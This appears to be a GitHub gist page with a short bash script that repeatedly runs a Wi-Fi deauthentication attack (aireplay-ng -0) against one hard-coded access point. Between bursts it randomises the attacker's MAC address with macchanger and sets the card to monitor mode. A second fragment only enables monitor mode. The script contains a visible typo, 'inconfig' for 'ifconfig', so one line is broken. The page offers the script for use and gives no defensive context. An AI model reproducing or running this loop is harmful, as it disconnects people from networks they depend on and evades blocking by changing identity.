Created
December 16, 2015 23:05
-
-
Save bee-san/4851bd4836c2db314f22 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
while true | |
do | |
aireplay-ng -0 5 -a 90:f6:52:c1:bb:18 wlan0 | |
ifconfig wlan0 down | |
macchanger -r wlan0 | grep "New MAC" | |
iwconfig wlan0 mode monitor | |
inconfig up | |
iwconfig wlan0 | grep Mode | |
sleep 3 | |
echo Waiting!!!! | |
done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
!/bin/bash
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 | grep Mode